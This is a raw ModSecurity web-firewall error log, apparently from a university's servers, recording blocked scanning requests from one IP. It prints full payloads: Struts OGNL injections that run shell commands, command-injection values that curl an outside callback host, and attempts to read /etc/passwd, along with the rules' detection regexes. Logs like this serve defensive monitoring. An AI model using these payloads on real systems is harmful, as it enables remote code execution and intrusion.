java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASAHdsAAAAH"]
[Tue Aug 29 11:33:49.369730 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11LcCo-f0AAARdiMYAAAAK"]
[Tue Aug 29 11:33:49.390794 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASAHd0AAAAH"]
[Tue Aug 29 11:33:49.394690 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASEJQUAAAAE"]
[Tue Aug 29 11:33:49.407173 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARtAB8AAAAV"]
[Tue Aug 29 11:33:49.417486 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAANsAmAAAAAD"]
[Tue Aug 29 11:33:49.428953 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgnwf3xhhifybjx.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAASFed0AAAAG"]
[Tue Aug 29 11:33:50.307953 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgep43kcxgbqqg8.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAANsAmEAAAAD"]
[Tue Aug 29 11:33:50.313103 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAASFed4AAAAG"]
[Tue Aug 29 11:33:50.315801 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAAR@KIkAAAAF"]
[Tue Aug 29 11:33:50.326583 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAASEJQgAAAAE"]
[Tue Aug 29 11:33:50.336704 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtu31ccw41xqoj.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASAHeAAAAAH"]
[Tue Aug 29 11:33:50.342300 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgkpthq6f3aqq1k.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASFed8AAAAG"]
[Tue Aug 29 11:33:50.347690 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11LsCo-f0AAARQ4CwAAAAB"]
[Tue Aug 29 11:33:50.367034 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtg4pfr6xnc7ay.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARy-0oAAAAb"]
[Tue Aug 29 11:33:50.384233 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARjjSkAAAAL"]
[Tue Aug 29 11:33:50.387397 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARy-0sAAAAb"]
[Tue Aug 29 11:33:50.388891 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtkaxp8hx17ywx.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARdiMsAAAAK"]
[Tue Aug 29 11:33:50.412634 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgmtnqwgjph6dhf.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11LsCo-f0AAARtACYAAAAV"]
[Tue Aug 29 11:33:51.318621 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASEJQoAAAAE"]
[Tue Aug 29 11:33:51.326304 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAAQKOp0AAAAs"]
[Tue Aug 29 11:33:51.329256 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARjjSwAAAAL"]
[Tue Aug 29 11:33:51.335037 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAASFeeQAAAAG"]
[Tue Aug 29 11:33:51.337493 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAANsAmcAAAAD"]
